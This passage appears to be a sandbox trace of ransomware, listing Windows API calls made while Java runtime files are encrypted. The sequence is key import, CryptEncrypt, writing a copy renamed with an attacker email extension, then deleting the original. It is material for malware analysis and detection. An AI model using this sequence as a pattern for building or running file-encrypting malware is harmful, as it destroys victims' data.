Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll")) returned 1 [0151.782] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.783] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=35392) returned 1 [0151.783] CloseHandle (hObject=0x308) returned 1 [0151.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll")) returned 0x20 [0151.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.783] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.783] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.784] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0151.784] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.784] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x8a40, lpOverlapped=0x0) returned 1 [0151.786] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x8a50, dwBufLen=0x8a50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x8a50) returned 1 [0151.786] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x8a50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x8a50, lpOverlapped=0x0) returned 1 [0151.787] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3130) returned 1 [0151.787] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.787] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.787] CryptDestroyKey (hKey=0xac3130) returned 1 [0151.787] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.787] CryptDestroyKey (hKey=0xac33f0) returned 1 [0151.787] CloseHandle (hObject=0x308) returned 1 [0151.787] CloseHandle (hObject=0x2e0) returned 1 [0151.787] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsound.dll")) returned 1 [0151.789] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.789] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=31296) returned 1 [0151.789] CloseHandle (hObject=0x2e0) returned 1 [0151.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll")) returned 0x20 [0151.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.789] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.789] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.789] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0151.789] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.790] ReadFile (in: hFile=0x2e0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x7a40, lpOverlapped=0x0) returned 1 [0151.791] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x7a50, dwBufLen=0x7a50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x7a50) returned 1 [0151.791] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x7a50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x7a50, lpOverlapped=0x0) returned 1 [0151.793] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3370) returned 1 [0151.793] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.793] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.793] CryptDestroyKey (hKey=0xac3370) returned 1 [0151.793] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.793] CryptDestroyKey (hKey=0xac33f0) returned 1 [0151.793] CloseHandle (hObject=0x2e0) returned 1 [0151.793] CloseHandle (hObject=0x308) returned 1 [0151.793] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsoundds.dll")) returned 1 [0151.794] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.794] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=220736) returned 1 [0151.794] CloseHandle (hObject=0x308) returned 1 [0151.794] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll")) returned 0x20 [0151.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.795] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.795] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.795] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.795] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.795] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d70) returned 1 [0151.795] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.795] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x35e40, lpOverlapped=0x0) returned 1 [0151.801] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x35e50, dwBufLen=0x35e50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x35e50) returned 1 [0151.802] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x35e50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x35e50, lpOverlapped=0x0) returned 1 [0151.805] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2df0) returned 1 [0151.805] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.805] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.805] CryptDestroyKey (hKey=0xac2df0) returned 1 [0151.805] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.805] CryptDestroyKey (hKey=0xac2d70) returned 1 [0151.805] CloseHandle (hObject=0x308) returned 1 [0151.806] CloseHandle (hObject=0x2e0) returned 1 [0151.806] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kcms.dll")) returned 1 [0151.808] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.808] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16448) returned 1 [0151.809] CloseHandle (hObject=0x2e0) returned 1 [0151.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe")) returned 0x20 [0151.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.809] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0151.809] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.809] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.809] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.809] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac34b0) returned 1 [0151.809] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.809] ReadFile (in: hFile=0x2e0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4040, lpOverlapped=0x0) returned 1 [0151.811] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050) returned 1 [0151.811] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4050, lpOverlapped=0x0) returned 1 [0151.812] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3430) returned 1 [0151.812] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.812] CryptEncrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.812] CryptDestroyKey (hKey=0xac3430) returned 1 [0151.812] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.812] CryptDestroyKey (hKey=0xac34b0) returned 1 [0151.812] CloseHandle (hObject=0x2e0) returned 1 [0151.812] CloseHandle (hObject=0x308) returned 1 [0151.813] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe")) returned 1 [0151.814] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.814] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16448) returned 1 [0151.814] CloseHandle (hObject=0x308) returned 1 [0151.814] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe")) returned 0x20 [0151.814] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.814] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.814] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.917] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2f70) returned 1 [0151.917] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.917] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4040, lpOverlapped=0x0) returned 1 [0151.920] CryptEncrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050) returned 1 [0151.920] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4050, lpOverlapped=0x0) returned 1 [0151.922] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2f30) returned 1 [0151.922] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.922] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.922] CryptDestroyKey (hKey=0xac2f30) returned 1 [0151.922] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.922] CryptDestroyKey (hKey=0xac2f70) returned 1 [0151.922] CloseHandle (hObject=0x308) returned 1 [0151.922] CloseHandle (hObject=0x2f8) returned 1 [0151.922] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe")) returned 1 [0151.923] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.924] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16448) returned 1 [0151.924] CloseHandle (hObject=0x2f8) returned 1 [0151.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe")) returned 0x20 [0151.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.924] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.924] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.924] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2ff0) returned 1 [0151.924] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.924] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4040, lpOverlapped=0x0) returned 1 [0151.928] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050) returned 1 [0151.928] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4050, lpOverlapped=0x0) returned 1 [0151.929] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3070) returned 1 [0151.930] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, 